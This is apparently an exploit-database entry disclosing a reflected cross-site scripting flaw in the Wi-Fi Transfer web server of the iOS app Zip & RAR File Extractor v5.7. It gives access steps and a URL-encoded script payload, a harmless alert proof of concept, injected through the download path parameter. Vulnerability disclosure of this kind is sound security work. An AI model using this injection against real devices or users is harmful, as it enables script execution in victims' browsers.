# Exploit Title: Zip & RAR FileExtractor  v5.7 - Reflected XSS
# Vendor Homepage: Penghui Zhao
# Software Link: https://apps.apple.com/tr/app/zip-rar-file-extractor/id769409043?l=en
# Date: 2023-06-20
# Exploit Author: tmrswrr
# Category : ios app
# Version: v5.7
# Tested on: Windows/Linux


## Description:

>> Go to Wi-Fi Transfer section in zip rar file extractor app
>> It will be create link : 192.168.1.104:8080
>> When open link your browser , write payload, xss payload execute page and see alert button

Url: http://192.168.1.104:8080/download?path=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E
Payload: %22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E